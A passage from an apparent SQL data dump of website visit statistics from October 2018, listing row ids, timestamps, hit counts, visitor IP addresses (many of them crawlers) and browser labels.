3474,1,1,0,0,'216.244.66.241','other'),(320136,1540273876,2,2,0,0,'178.154.244.29','other'),(320137,1540274166,1,1,0,0,'91.196.178.133','chrome'),(320138,1540274546,1,1,0,0,'91.196.178.186','chrome'),(320139,1540274571,1,1,0,0,'91.196.178.177','chrome'),(320140,1540275327,1,1,0,0,'46.30.166.126','chrome'),(320141,1540275964,1,1,0,0,'91.196.178.89','chrome'),(320142,1540276132,2,2,0,0,'5.45.207.79','other'),(320143,1540276315,1,1,0,0,'207.46.13.213','other'),(320144,1540276460,1,1,0,0,'178.154.244.29','other'),(320145,1540277090,1,1,0,0,'66.249.66.157','chrome'),(320146,1540278709,1,1,0,0,'66.102.9.40','chrome'),(320147,1540278775,1,1,0,0,'91.210.116.146','chrome'),(320148,1540279021,1,1,0,0,'8.29.198.26','other'),(320149,1540279221,1,1,0,0,'213.111.236.54','chrome'),(320150,1540279263,1,1,0,0,'46.229.168.142','other'),(320151,1540279309,1,1,0,0,'13.66.139.0','other'),(320152,1540279331,1,1,0,0,'8.29.198.25','other'),(320153,1540279636,1,1,0,0,'40.77.167.1','other'),(320154,1540279746,1,1,0,0,'130.180.219.233','chrome'),(320155,1540279756,1,1,0,0,'194.44.45.123','chrome'),(320156,1540280336,1,1,0,0,'213.111.236.54','chrome'),(320157,1540280865,1,1,0,0,'82.207.49.94','chrome'),(320158,1540281191,2,2,0,0,'91.196.178.71','chrome'),(320159,1540281229,1,1,0,0,'216.244.66.241','other'),(320160,1540282500,1,1,0,0,'47.92.248.5','other'),(320161,1540282555,1,1,0,0,'8.29.198.25','other'),(320162,1540282960,1,1,0,0,'141.8.142.144','other'),(320163,1540283304,1,1,0,0,'95.163.255.92','other'),(320164,1540283435,4,4,0,0,'178.154.244.29','other'),(320165,1540283439,3,3,0,0,'178.154.244.11','other'),(320166,1540283442,1,1,0,0,'37.9.113.148','other'),(320167,1540283620,1,1,0,0,'91.196.178.169','chrome'),(320168,1540283629,1,1,0,0,'5.45.207.79','other'),(320169,1540284004,1,1,0,0,'91.196.178.133','chrome'),(320170,1540284535,2,2,0,0,'95.213.141.126','opera'),(320171,1540284548,3,3,0,0,'5.45.207.79','other'),(320172,1540284577,3,3,0,0,'178.154.244.29','other'),(320173,1540284602,1,1,0,0,'37.9.113.20','other'),(320174,1540284843,1,1,0,0,'40.77.167.1','other'),(320175,1540285173,1,1,0,0,'216.244.66.241','other'),(320176,1540285280,1,1,0,0,'46.229.168.129','other'),(320177,1540285421,2,2,0,0,'178.154.244.11','other'),(320178,1540285423,2,2,0,0,'5.45.207.19','other'),(320179,1540285620,1,1,0,0,'37.53.123.219','chrome'),(320180,1540285637,1,1,0,0,'178.154.244.29','other'),(320181,1540285799,1,1,0,0,'95.132.58.207','firefox'),(320182,1540285935,1,1,0,0,'66.102.9.27','chrome'),(320183,1540286026,1,1,0,0,'95.163.255.112','other'),(320184,1540286276,2,2,0,0,'37.53.228.75','chrome'),(320185,1540286485,1,1,0,0,'216.244.66.241','other'),(320186,1540286682,5,5,0,0,'178.154.244.29','other'),(320187,1540286869,1,1,0,0,'180.76.15.163','other'),(320188,1540286915,2,2,0,0,'5.45.207.79','other'),(320189,1540286930,1,1,0,0,'5.45.207.19','other'),(320190,1540286934,4,4,0,0,'178.154.244.11','other'),(320191,1540286953,1,1,0,0,'37.9.113.20','other'),(320192,1540286956,1,1,0,0,'141.8.142.103','other'),(320193,1540288342,1,1,0,0,'193.106.30.98','firefox'),(320194,1540288904,1,1,0,0,'91.196.178.89','chrome'),(320195,1540288998,1,1,0,0,'216.244.66.241','other'),(320196,1540289559,1,1,0,0,'207.46.13.213','other'),(320197,1540289867,1,1,0,0,'8.29.198.25','other'),(320198,1540290165,1,1,0,0,'8.29.198.26','other'),(320199,1540291541,1,1,0,0,'46.229.168.138','other'),(320200,1540291730,1,1,0,0,'91.209.11.236','other'),(320201,1540292314,4,4,0,0,'91.196.178.183','chrome'),(320202,1540293390,1,1,0,0,'8.29.198.26','other'),(320203,1540293562,1,1,0,0,'46.229.168.154','other'),(320204,1540293588,1,1,0,0,'207.46.13.213','other'),(320205,1540293761,1,1,0,0,'91.196.178.183','chrome'),(320206,1540294627,1,1,0,0,'95.163.255.96','other'),(320207,1540294942,1,1,0,0,'91.196.178.40','chrome'),(320208,1540295016,1,1,0,0,'178.62.238.64','chrome'),(320209,1540295409,12,12,0,0,'23.237.4.26','other'),(320210,1540295767,1,1,0,0,'217.117.75.167','firefox'),(320211,1540295809,1,1,0,0,'91.196.178.104','chrome'),(320212,1540295931,1,1,0,0,'178.62.238.64','chrome'),(320213,1540297254,3,3,0,0,'178.154.244.11','other'),(320214,1540297350,1,1,0,0,'39.104.151.218','other'),(320215,1540297656,9,9,0,0,'178.154.244.29','other'),(320216,1540297750,2,2,0,0,'91.196.178.166','chrome'),(320217,1540297871,1,1,0,0,'13.66.139.0','other'),(320218,1540298098,1,1,0,0,'5.45.207.79','other'),(320219,1540298180,1,1,0,0,'178.154.244.11','other'),(320220,1540298882,1,1,0,0,'207.46.13.160','other'),(320221,1540298936,5,5,0,0,'178.154.244.29','other'),(320222,1540299058,1,1,0,0,'87.250.224.47','other'),(320223,1540299061,2,2,0,0,'87.250.224.65','other'),(320224,1540299070,1,1,0,0,'213.180.203.9','other'),(320225,1540299072,1,1,0,0,'178.154.200.48','other'),(320226,1540299075,2,2,0,0,'141.8.132.16','other'),(320227,1540299078,1,1,0,0,'141.8.183.23','other'),(320228,1540299083,2,2,0,0,'5.45.207.79','other'),(320229,1540299085,1,1,0,0,'141.8.142.103','other'),(320230,1540299093,2,2,0,0,'141.8.142.108','other'),(320231,1540299114,1,1,0,0,'213.180.203.40','other'),(320232,1540299361,2,2,0,0,'178.154.244.11','other'),(320233,1540299382,1,1,0,0,'18.217.233.152','firefox'),(320234,1540299800,1,1,0,0,'5.45.207.8','other'),(320235,1540299802,1,1,0,0,'178.154.244.49','other'),(320236,1540300290,1,0,1,0,'66.249.66.155',''),(320237,1540300303,1,0,1,0,'66.249.66.156',''),(320238,1540300452,2,2,0,0,'178.154.244.29','other'),(320239,1540300460,1,1,0,0,'91.196.178.183','chrome'),(320240,1540300483,1,1,0,0,'31.134.209.223','chrome'),(320241,1540300515,1,1,0,0,'157.55.39.153','other'),(320242,1540300677,1,1,0,0,'95.163.255.92','other'),(320243,1540300714,2,2,0,0,'8.29.198.26','other'),(320244,1540300779,1,1,0,0,'5.45.207.79','other'),(320245,1540300870,1,1,0,0,'213.180.203.9','other'),(320246,1540300948,1,1,0,0,'5.255.253.38','other'),(320247,1540300949,1,1,0,0,'141.8.142.144','other'),(320248,1540301153,1,1,0,0,'178.154.244.65','other'),(320249,1540301186,1,1,0,0,'91.196.178.89','chrome'),(320250,1540301284,1,1,0,0,'5.45.207.19','other'),(320251,1540301286,1,1,0,0,'141.8.142.162','other'),(320252,1540301395,2,2,0,0,'141.8.142.108','other'),(320253,1540301490,1,1,0,0,'213.180.203.40','other'),(320254,1540301945,1,1,0,0,'213.180.203.17','other'),(320255,1540301992,1,1,0,0,'95.132.28.156','firefox'),(320256,1540302157,1,1,0,0,'141.8.142.65','other'),(320257,1540302934,1,1,0,0,'213.180.203.40','other'),(320258,1540303072,1,1,0,0,'178.154.244.49','other'),(320259,1540303085,1,1,0,0,'5.255.253.38','other'),(320260,1540303509,1,1,0,0,'141.8.142.38','other'),(320261,1540303510,1,1,0,0,'178.154.244.11','other'),(320262,1540303514,1,1,0,0,'87.250.224.47','other'),(320263,1540304059,1,1,0,0,'91.196.178.129','chrome'),(320264,1540304227,1,1,0,0,'8.29.198.25','other'),(320265,1540305283,1,1,0,0,'40.77.167.1','other'),(320266,1540305472,3,3,0,0,'91.196.177.15','chrome'),(320267,1540305618,1,1,0,0,'178.154.171.24','other'),(320268,1540305620,1,1,0,0,'178.154.244.65','other'),(320269,1540305621,1,1,0,0,'178.154.244.49','other'),(320270,1540305622,1,1,0,0,'178.154.200.48','other'),(320271,1540305623,1,1,0,0,'213.180.203.40','other'),(320272,1540305624,1,1,0,0,'87.250.224.64','other'),(320273,1540305630,1,1,0,0,'141.8.142.81','other'),(320274,1540306123,1,1,0,0,'188.230.43.254','other'),(320275,1540306596,1,1,0,0,'46.229.168.149','other'),(320276,1540308525,1,1,0,0,'188.230.43.254','other'),(320277,1540309947,1,1,0,0,'141.8.183.23','other'),(320278,1540309951,1,1,0,0,'5.255.253.25','other'),(320279,1540310569,1,1,0,0,'91.196.178.87','firefox'),(320280,1540311484,1,1,0,0,'66.249.66.59','chrome'),(320281,1540311567,1,1,0,0,'8.29.198.25','other'),(320282,1540311862,1,1,0,0,'8.29.198.27','other'),(320283,1540312270,1,1,0,0,'66.249.66.157','chrome'),(320284,1540312279,1,1,0,0,'178.154.244.49','other'),(320285,1540312793,1,1,0,0,'46.229.168.147','other'),(320286,1540313009,1,1,0,0,'213.180.203.40','other'),(320287,1540314908,1,1,0,0,'46.229.168.136','other'),(320288,1540315055,1,1,0,0,'8.29.198.25','other'),(320289,1540315437,1,1,0,0,'207.46.13.160','other'),(320290,1540318157,1,1,0,0,'5.45.207.8','other'),(320291,1540318568,1,1,0,0,'91.196.178.186','chrome'),(320292,1540319986,1,1,0,0,'40.77.167.1','other'),(320293,1540320013,1,1,0,0,'180.163.220.68','other'),(320294,1540320014,1,1,0,0,'180.163.220.5','other'),(320295,1540321501,1,1,0,0,'157.55.39.153','other'),(320296,1540322408,2,2,0,0,'8.29.198.26','other'),(320297,1540322493,1,1,0,0,'46.229.168.137','other'),(320298,1540322760,1,1,0,0,'46.133.100.34','chrome'),(320299,1540322893,1,1,0,0,'46.229.168.143','other'),(320300,1540323090,1,1,0,0,'157.55.39.153','other'),(320301,1540324766,1,1,0,0,'180.76.15.30','other'),(320302,1540324946,1,1,0,0,'207.46.13.160','other'),(320303,1540325905,1,1,0,0,'8.29.198.25','other'),(320304,1540325978,1,1,0,0,'66.249.66.61','chrome'),(320305,1540326540,1,1,0,0,'95.163.255.97','other'),(320306,1540326762,1,1,0,0,'178.154.244.11','other'),(320307,1540327441,1,1,0,0,'180.76.15.16','other'),(320308,1540327645,1,1,0,0,'77.222.156.9','firefox'),(320309,1540327766,1,1,0,0,'37.73.208.243','chrome'),(320310,1540328194,1,1,0,0,'207.46.13.160','other'),(320311,1540328437,1,1,0,0,'207.46.13.213','other'),(320312,1540329128,1,1,0,0,'66.249.66.156','chrome'),(320313,1540329442,1,1,0,0,'157.55.39.153','other'),(320314,1540330071,1,1,0,0,'180.76.15.146','other'),(320315,1540330616,1,1,0,0,'207.46.13.160','other'),(320316,1540332668,1,1,0,0,'157.55.39.153','other'),(320317,1540333240,1,1,0,0,'8.29.198.25','other'),(320318,1540333556,1,1,0,0,'8.29.198.27','other'),(320319,1540333630,1,1,0,0,'95.163.255.97','other'),(320320,1540334169,1,1,0,0,'157.55.39.153','other'),(320321,1540334873,1,1,0,0,'40.77.167.1','other'),(320322,1540336739,1,1,0,0,'8.29.198.27','other'),(320323,1540342784,2,2,0,0,'216.244.66.241','other'),(320324,1540344080,1,1,0,0,'8.29.198.25','other'),(320325,1540344393,1,1,0,0,'8.29.198.27','other'),(320326,1540344455,1,1,0,0,'193.106.30.98','firefox'),(320327,1540344788,1,1,0,0,'66.249.66.156','chrome'),(320328,1540345104,1,1,0,0,'46.229.168.140','other'),(320329,1540345520,1,1,0,0,'95.108.181.75','other'),(320330,1540346200,1,1,0,0,'46.229.168.129','other'),(320331,1540347352,1,1,0,0,'163.172.4.153','firefox'),(320332,1540347579,1,1,0,0,'8.29.198.27','other'),(320333,1540348011,1,1,0,0,'216.244.66.241','other'),(320334,1540348988,1,1,0,0,'66.249.66.156','chrome'),(320335,1540351211,1,1,0,0,'54.190.65.149','chrome'),(320336,1540352268,1,1,0,0,'66.249.66.61','chrome'),(320337,1540352445,1,1,0,0,'212.224.124.122','firefox'),(320338,1540353390,1,1,0,0,'188.32.132.242','msie'),(320339,1540354369,1,1,0,0,'95.163.255.95','other'),(320340,1540354938,1,1,0,0,'8.29.198.26','other'),(320341,1540355233,1,1,0,0,'8.29.198.27','other'),(320342,1540355766,1,1,0,0,'216.244.66.241','other'),(320343,1540357846,1,1,0,0,'216.244.66.241','other'),(320344,1540358202,1,1,0,0,'207.46.13.213','other'),(320345,1540358372,1,1,0,0,'91.196.177.46','chrome'),(320346,1540358414,1,1,0,0,'8.29.198.25','other'),(320347,1540358666,1,1,0,0,'66.249.66.59','chrome'),(320348,1540358713,1,1,0,0,'77.93.41.218','chrome'),(320349,1540358865,1,1,0,0,'91.196.178.72','firefox'),(320350,1540359195,1,1,0,0,'91.196.178.89','chrome'),(320351,1540359831,1,1,0,0,'91.196.178.72','firefox'),(320352,1540359920,2,2,0,0,'91.196.178.186','chrome'),(320353,1540360313,1,1,0,0,'91.196.177.46','chrome'),(320354,1540360966,1,1,0,0,'91.196.178.89','chrome'),(320355,1540361858,1,1,0,0,'207.46.13.213','other'),(320356,1540364146,1,1,0,0,'82.207.49.102','chrome'),(320357,1540364276,1,1,0,0,'46.229.168.135','other'),(320358,1540365580,2,2,0,0,'91.196.178.72','chrome'),(320359,1540365790,2,2,0,0,'8.29.198.25','other'),(320360,1540366036,1,1,0,0,'82.145.208.242','other'),(320361,1540366719,1,1,0,0,'66.249.66.156','chrome'),(320362,1540367338,1,1,0,0,'91.196.178.186','chrome'),(320363,1540367587,1,1,0,0,'91.196.178.89','chrome'),(320364,1540367691,1,1,0,0,'91.196.178.133','chrome'),(320365,1540368214,1,1,0,0,'95.135.141.236','chrome'),(320366,1540368472,1,1,0,0,'216.244.66.241','other'),(320367,1540368613,1,1,0,0,'46.211.112.120','chrome'),(320368,1540368948,1,1,0,0,'82.145.208.158','other'),(320369,1540369254,1,1,0,0,'8.29.198.27','other'),(320370,1540369535,2,2,0,0,'216.244.66.241','other'),(320371,1540369769,1,1,0,0,'91.196.178.78','firefox'),(320372,1540370400,1,1,0,0,'95.133.11.59','chrome'),(320373,1540370619,2,2,0,0,'216.244.66.241','other'),(320374,1540370718,1,1,0,0,'5.58.77.63','chrome'),(320375,1540371297,2,2,0,0,'91.196.178.78','firefox'),(320376,1540371325,1,1,0,0,'47.92.244.10','other'),(320377,1540372648,1,1,0,0,'207.46.13.160','other'),(320378,1540372817,1,1,0,0,'46.229.168.137','other'),(320379,1540373425,1,1,0,0,'216.244.66.241','other'),(320380,1540373662,8,8,0,0,'207.46.13.160','other'),(320381,1540373673,10,10,0,0,'40.77.167.1','other'),(320382,1540373685,7,7,0,0,'157.55.39.153','other'),(320383,1540373694,6,6,0,0,'207.46.13.213','other'),(320384,1540373696,1,1,0,0,'178.92.141.16','firefox'),(320385,1540373714,3,3,0,0,'91.196.178.78','firefox'),(320386,1540374602,1,1,0,0,'66.249.66.156','chrome'),(320387,1540375063,1,1,0,0,'46.229.168.133','other'),(320388,1540375151,1,1,0,0,'207.46.13.213','other'),(320389,1540376408,1,0,1,0,'66.249.66.61',''),(320390,1540376487,1,1,0,0,'178.255.215.94','other'),(320391,1540376634,1,1,0,0,'8.29.198.27','other'),(320392,1540376903,1,1,0,0,'8.29.198.26','other'),(320393,1540378485,1,1,0,0,'216.244.66.241','other'),(320394,1540378879,6,6,0,0,'178.154.244.29','other'),(320395,1540378911,1,1,0,0,'141.8.142.103','other'),(320396,1540378915,1,1,0,0,'141.8.142.108','other'),(320397,1540379205,1,1,0,0,'176.106.5.30','chrome'),(320398,1540380092,1,1,0,0,'8.29.198.27','other'),(320399,1540380343,1,1,0,0,'93.183.226.149','chrome'),(320400,1540380541,1,1,0,0,'46.188.32.25','msie'),(320401,1540380751,2,2,0,0,'91.208.145.231','chrome'),(320402,1540380787,1,1,0,0,'216.244.66.241','other'),(320403,1540381465,1,1,0,0,'37.53.164.76','opera'),(320404,1540381925,1,1,0,0,'176.110.134.2','chrome'),(320405,1540382064,1,1,0,0,'157.55.39.153','other'),(320406,1540385537,6,6,0,0,'194.67.210.57','firefox'),(320407,1540387219,1,1,0,0,'91.196.177.46','chrome'),(320408,1540387499,1,1,0,0,'8.29.198.27','other'),(320409,1540387748,1,1,0,0,'8.29.198.26','other'),(320410,1540388795,1,1,0,0,'46.229.168.137','other'),(320411,1540388853,2,2,0,0,'216.244.66.241','other'),(320412,1540389306,1,1,0,0,'91.196.178.77','chrome'),(320413,1540390363,1,1,0,0,'216.244.66.241','other'),(320414,1540390450,1,1,0,0,'46.229.168.146','other'),(320415,1540390901,1,1,0,0,'37.73.202.125','chrome'),(320416,1540390939,1,1,0,0,'8.29.198.26','other'),(320417,1540391386,1,1,0,0,'91.196.177.46','firefox'),(320418,1540391686,1,1,0,0,'94.179.209.145','chrome'),(320419,1540392142,1,1,0,0,'188.230.43.254','other'),(320420,1540392948,1,1,0,0,'91.209.11.236','other'),(320421,1540392961,1,1,0,0,'91.124.238.232','firefox'),(320422,1540393994,1,1,0,0,'91.209.11.236','other'),(320423,1540394228,1,1,0,0,'91.196.178.84','firefox'),(320424,1540394233,2,2,0,0,'37.73.130.16','chrome'),(320425,1540394654,1,1,0,0,'188.230.43.254','other'),(320426,1540394657,1,1,0,0,'95.163.255.92','other'),(320427,1540395147,1,1,0,0,'5.45.207.79','other'),(320428,1540395308,1,1,0,0,'207.46.13.160','other'),(320429,1540396815,1,1,0,0,'180.76.15.7','other'),(320430,1540397413,1,1,0,0,'180.76.15.147','other'),(320431,1540397735,1,1,0,0,'46.229.168.130','other'),(320432,1540398337,1,1,0,0,'8.29.198.26','other'),(320433,1540398587,1,1,0,0,'8.29.198.27','other'),(320434,1540398886,1,1,0,0,'46.229.168.145','other'),(320435,1540399242,1,1,0,0,'193.106.30.98','firefox'),(320436,1540399559,1,1,0,0,'46.229.168.137','other'),(320437,1540400054,1,1,0,0,'46.229.168.132','other'),(320438,1540401427,4,4,0,0,'178.154.244.11','other'),(320439,1540401436,1,1,0,0,'66.249.66.155','chrome'),(320440,1540401677,1,1,0,0,'178.154.244.29','other'),(320441,1540401709,1,1,0,0,'91.209.11.236','other'),(320442,1540401777,1,1,0,0,'8.29.198.27','other'),(320443,1540402448,1,1,0,0,'178.154.244.11','other'),(320444,1540402671,3,3,0,0,'178.154.244.29','other'),(320445,1540403372,1,1,0,0,'207.46.13.213','other'),(320446,1540403422,1,1,0,0,'80.252.153.33','firefox'),(320447,1540403424,1,1,0,0,'46.229.168.143','other'),(320448,1540403671,2,2,0,0,'178.154.244.11','other'),(320449,1540403673,2,2,0,0,'178.154.244.29','other'),(320450,1540403733,1,1,0,0,'5.45.207.79','other'),(320451,1540403953,1,1,0,0,'5.58.176.52','chrome'),(320452,1540404600,2,2,0,0,'178.154.244.29','other'),(320453,1540404983,1,1,0,0,'178.154.244.11','other'),(320454,1540405220,1,1,0,0,'95.163.255.94','other'),(320455,1540405800,1,1,0,0,'178.154.244.29','other'),(320456,1540406018,1,1,0,0,'66.249.66.155','chrome'),(320457,1540406831,1,1,0,0,'212.66.52.63','chrome'),(320458,1540407227,1,1,0,0,'5.45.207.79','other'),(320459,1540407270,1,1,0,0,'178.154.244.11','other'),(320460,1540407588,1,1,0,0,'180.76.15.33','other'),(320461,1540407884,1,1,0,0,'46.229.168.143','other'),(320462,1540408191,1,1,0,0,'213.180.203.40','other'),(320463,1540408276,1,1,0,0,'46.211.104.75','chrome'),(320464,1540408906,1,1,0,0,'176.110.134.2','chrome'),(320465,1540408931,1,1,0,0,'178.154.244.29','other'),(320466,1540409105,1,1,0,0,'95.163.255.107','other'),(320467,1540409107,1,1,0,0,'95.108.181.75','other'),(320468,1540409111,3,3,0,0,'95.163.255.109','other'),(320469,1540409130,2,2,0,0,'95.163.255.105','other'),(320470,1540409139,1,1,0,0,'95.163.255.108','other'),(320471,1540409145,2,2,0,0,'95.163.255.102','other'),(320472,1540409151,1,1,0,0,'95.163.255.118','other'),(320473,1540409157,1,1,0,0,'95.163.255.117','other'),(320474,1540409166,1,1,0,0,'95.163.255.112','other'),(320475,1540409172,2,2,0,0,'95.163.255.104','other'),(320476,1540409185,2,2,0,0,'8.29.198.26','other'),(320477,1540409318,1,1,0,0,'95.163.255.95','other'),(320478,1540409588,1,1,0,0,'180.76.15.162','other'),(320479,1540409644,1,1,0,0,'178.154.244.11','other'),(320480,1540409822,1,1,0,0,'141.8.142.103','other'),(320481,1540411516,1,1,0,0,'5.45.207.79','other'),(320482,1540411840,1,1,0,0,'46.229.168.134','other'),(320483,1540412618,1,1,0,0,'8.29.198.27','other'),(320484,1540414848,1,1,0,0,'207.46.13.213','other'),(320485,1540415381,1,1,0,0,'46.229.168.150','other'),(320486,1540416218,1,1,0,0,'178.154.244.29','other'),(320487,1540417190,1,1,0,0,'46.229.168.148','other'),(320488,1540417369,1,1,0,0,'216.244.66.241','other'),(320489,1540417550,1,1,0,0,'39.104.157.152','other'),(320490,1540418991,1,1,0,0,'178.154.244.11','other'),(320491,1540419327,1,1,0,0,'207.46.13.160','other'),(320492,1540420037,1,1,0,0,'8.29.198.25','other'),(320493,1540420272,1,1,0,0,'8.29.198.27','other'),(320494,1540421247,1,1,0,0,'178.154.244.29','other'),(320495,1540422175,1,1,0,0,'95.163.255.95','other'),(320496,1540423456,1,1,0,0,'8.29.198.25','other'),(320497,1540423473,1,1,0,0,'5.45.207.19','other'),(320498,1540424547,1,1,0,0,'178.154.244.29','other'),(320499,1540425895,1,1,0,0,'66.249.66.156','chrome'),(320500,1540426255,1,1,0,0,'46.229.168.142','other'),(320501,1540426613,1,1,0,0,'157.55.39.153','other'),(320502,1540428181,1,1,0,0,'207.46.13.213','other'),(320503,1540428304,1,1,0,0,'40.77.167.1','other'),(320504,1540430052,1,1,0,0,'66.249.66.157','chrome'),(320505,1540430282,1,1,0,0,'178.154.244.29','other'),(320506,1540430416,1,1,0,0,'66.249.66.59','chrome'),(320507,1540430873,1,1,0,0,'8.29.198.27','other'),(320508,1540430965,1,1,0,0,'66.249.66.156','chrome'),(320509,1540431115,1,1,0,0,'8.29.198.26','other'),(320510,1540432335,1,1,0,0,'207.46.13.213','other'),(320511,1540432887,1,1,0,0,'34.208.201.179','chrome'),(320512,1540433139,2,2,0,0,'46.229.168.153','other'),(320513,1540434292,1,1,0,0,'8.29.198.26','other'),(320514,1540434484,1,1,0,0,'66.249.66.155','chrome'),(320515,1540434731,1,1,0,0,'216.244.66.241','other'),(320516,1540435024,1,1,0,0,'66.249.66.156','chrome'),(320517,1540435416,1,1,0,0,'95.163.255.96','other'),(320518,1540435753,1,1,0,0,'217.69.143.56','other'),(320519,1540436489,1,1,0,0,'46.229.168.153','other'),(320520,1540436547,1,0,1,0,'66.249.66.157',''),(320521,1540436824,1,1,0,0,'66.249.66.155','chrome'),(320522,1540437466,1,1,0,0,'216.244.66.241','other'),(320523,1540437959,3,3,0,0,'69.58.178.56','other'),(320524,1540438402,1,1,0,0,'52.53.201.78','chrome'),(320525,1540438863,1,1,0,0,'46.229.168.143','other'),(320526,1540439190,1,1,0,0,'66.249.66.156','chrome'),(320527,1540439196,2,2,0,0,'66.249.66.155','chrome'),(320528,1540439639,2,2,0,0,'66.249.66.157','chrome'),(320529,1540441156,1,1,0,0,'46.229.168.144','other'),(320530,1540441706,1,1,0,0,'8.29.198.27','other'),(320531,1540441949,1,1,0,0,'8.29.198.26','other'),(320532,1540442884,1,1,0,0,'91.196.178.129','firefox'),(320533,1540443377,1,1,0,0,'38.145.111.170','chrome'),(320534,1540443947,1,1,0,0,'66.249.66.155','chrome'),(320535,1540444441,1,1,0,0,'91.196.178.129','chrome'),(320536,1540445134,1,1,0,0,'8.29.198.26','other'),(320537,1540446725,1,1,0,0,'5.45.207.79','other'),(320538,1540447146,1,1,0,0,'77.111.244.198','chrome'),(320539,1540447628,1,1,0,0,'95.163.255.93','other'),(320540,1540448300,1,1,0,0,'207.46.13.213','other'),(320541,1540448605,1,1,0,0,'66.249.66.157','chrome'),(320542,1540450184,1,1,0,0,'37.55.131.89','chrome'),(320543,1540450721,1,1,0,0,'185.120.89.165','chrome'),(320544,1540450967,1,1,0,0,'5.45.207.79','other'),(320545,1540450970,1,1,0,0,'95.132.60.176','firefox'),(320546,1540451129,1,1,0,0,'178.154.244.29','other'),(320547,1540451185,1,1,0,0,'66.249.66.155','chrome'),(320548,1540451256,1,1,0,0,'91.196.178.89','chrome'),(320549,1540451359,1,1,0,0,'180.76.15.25','other'),(320550,1540452099,1,1,0,0,'91.196.177.46','chrome'),(320551,1540452425,1,1,0,0,'95.163.255.95','other'),(320552,1540452546,1,1,0,0,'8.29.198.27','other'),(320553,1540452592,1,1,0,0,'66.102.9.134','chrome'),(320554,1540452660,1,1,0,0,'46.229.168.142','other'),(320555,1540452730,1,1,0,0,'66.249.66.59','chrome'),(320556,1540452776,1,1,0,0,'8.29.198.25','other'),(320557,1540453267,1,1,0,0,'193.106.30.98','firefox'),(320558,1540453806,1,1,0,0,'66.249.66.59','chrome'),(320559,1540453843,1,1,0,0,'66.249.66.157','chrome'),(320560,1540454137,1,1,0,0,'91.196.178.97','chrome'),(320561,1540454745,1,1,0,0,'66.249.66.61','chrome'),(320562,1540455112,1,1,0,0,'46.211.50.157','chrome'),(320563,1540455616,1,1,0,0,'66.249.66.156','chrome'),(320564,1540455686,2,2,0,0,'66.249.66.61','chrome'),(320565,1540455964,1,1,0,0,'8.29.198.26','other'),(320566,1540456128,1,1,0,0,'82.145.208.209','other'),(320567,1540456277,1,1,0,0,'66.249.66.157','chrome'),(320568,1540458079,1,1,0,0,'66.249.66.156','chrome'),(320569,1540458251,1,1,0,0,'66.102.9.136','chrome'),(320570,1540458263,1,1,0,0,'66.102.9.134','chrome'),(320571,1540458416,1,1,0,0,'91.196.178.86','chrome'),(320572,1540458951,1,1,0,0,'91.219.144.110','chrome'),(320573,1540459300,1,1,0,0,'95.163.255.98','other'),(320574,1540459323,1,1,0,0,'91.196.178.86','chrome'),(320575,1540460370,2,2,0,0,'66.249.66.156','chrome'),(320576,1540460418,1,1,0,0,'66.249.66.157','chrome'),(320577,1540461576,1,1,0,0,'212.55.86.252','chrome'),(320578,1540461640,1,1,0,0,'66.249.66.156','chrome'),(320579,1540461697,1,1,0,0,'66.249.66.157','chrome'),(320580,1540461791,1,1,0,0,'91.196.178.86','firefox'),(320581,1540462768,2,2,0,0,'178.154.244.29','other'),(320582,1540462955,1,1,0,0,'141.8.142.103','other'),(320583,1540463387,1,1,0,0,'8.29.198.27','other'),(320584,1540463601,1,1,0,0,'207.46.13.213','other'),(320585,1540463616,1,1,0,0,'8.29.198.25','other'),(320586,1540463667,2,2,0,0,'66.249.66.155','chrome'),(320587,1540464315,1,1,0,0,'66.249.66.157','chrome'),(320588,1540464502,1,1,0,0,'178.154.244.11','other'),(320589,1540465090,1,1,0,0,'213.180.203.17','other'),(320590,1540465114,1,1,0,0,'178.154.244.29','other'),(320591,1540465265,1,1,0,0,'141.8.183.22','other'),(320592,1540465422,1,1,0,0,'216.244.66.241','other'),(320593,1540465512,1,1,0,0,'5.255.253.38','other'),(320594,1540465514,1,1,0,0,'178.154.171.17','other'),(320595,1540465720,1,1,0,0,'207.46.13.213','other'),(320596,1540466808,1,1,0,0,'8.29.198.25','other'),(320597,1540467446,1,1,0,0,'82.117.245.110','chrome'),(320598,1540467704,1,1,0,0,'178.95.166.121','chrome'),(320599,1540467775,1,1,0,0,'178.154.244.11','other'),(320600,1540467828,1,1,0,0,'66.249.66.61','chrome'),(320601,1540467986,1,1,0,0,'195.211.174.93','opera'),(320602,1540468108,1,1,0,0,'217.117.75.167','firefox'),(320603,1540468143,1,1,0,0,'66.249.66.157','chrome'),(320604,1540468293,2,2,0,0,'66.249.66.156','chrome'),(320605,1540468714,1,1,0,0,'66.249.66.155','chrome'),(320606,1540469187,1,1,0,0,'66.249.66.157','chrome'),(320607,1540469526,2,2,0,0,'66.249.66.156','chrome'),(320608,1540469905,1,1,0,0,'78.111.190.41','chrome'),(320609,1540470897,1,1,0,0,'46.211.133.177','chrome'),(320610,1540471137,1,1,0,0,'95.135.3.198','chrome'),(320611,1540471143,2,2,0,0,'66.249.66.156','chrome'),(320612,1540471498,1,1,0,0,'217.117.75.167','firefox'),(320613,1540471654,1,1,0,0,'66.249.66.59','chrome'),(320614,1540471711,2,2,0,0,'66.249.66.157','chrome'),(320615,1540472109,1,1,0,0,'178.92.13.78','chrome'),(320616,1540472895,1,1,0,0,'216.244.66.241','other'),(320617,1540473586,1,1,0,0,'66.249.66.155','chrome'),(320618,1540473716,1,1,0,0,'66.249.66.156','chrome'),(320619,1540474242,1,1,0,0,'8.29.198.25','other'),(320620,1540474445,1,1,0,0,'178.255.215.94','other'),(320621,1540474468,1,1,0,0,'8.29.198.26','other'),(320622,1540474770,1,1,0,0,'91.196.178.89','chrome'),(320623,1540475188,1,1,0,0,'188.230.43.254','other'),(320624,1540475875,1,1,0,0,'66.249.66.59','chrome'),(320625,1540476353,1,1,0,0,'216.244.66.241','other'),(320626,1540476354,1,1,0,0,'91.196.178.89','firefox'),(320627,1540476517,1,1,0,0,'178.154.244.29','other'),(320628,1540476637,1,1,0,0,'146.185.158.9','chrome'),(320629,1540476999,1,1,0,0,'188.230.43.254','other'),(320630,1540477642,1,1,0,0,'8.29.198.25','other'),(320631,1540477691,1,1,0,0,'91.196.178.93','firefox'),(320632,1540477755,1,1,0,0,'82.145.208.169','other'),(320633,1540478138,1,1,0,0,'66.249.66.57','chrome'),(320634,1540478240,1,1,0,0,'95.163.255.97','other'),(320635,1540478320,1,1,0,0,'66.249.66.156','chrome'),(320636,1540478401,1,1,0,0,'66.249.66.157','chrome'),(320637,1540478738,1,1,0,0,'46.229.168.140','other'),(320638,1540478828,1,1,0,0,'216.244.66.241','other'),(320639,1540479111,1,1,0,0,'46.229.168.138','other'),(320640,1540479292,1,1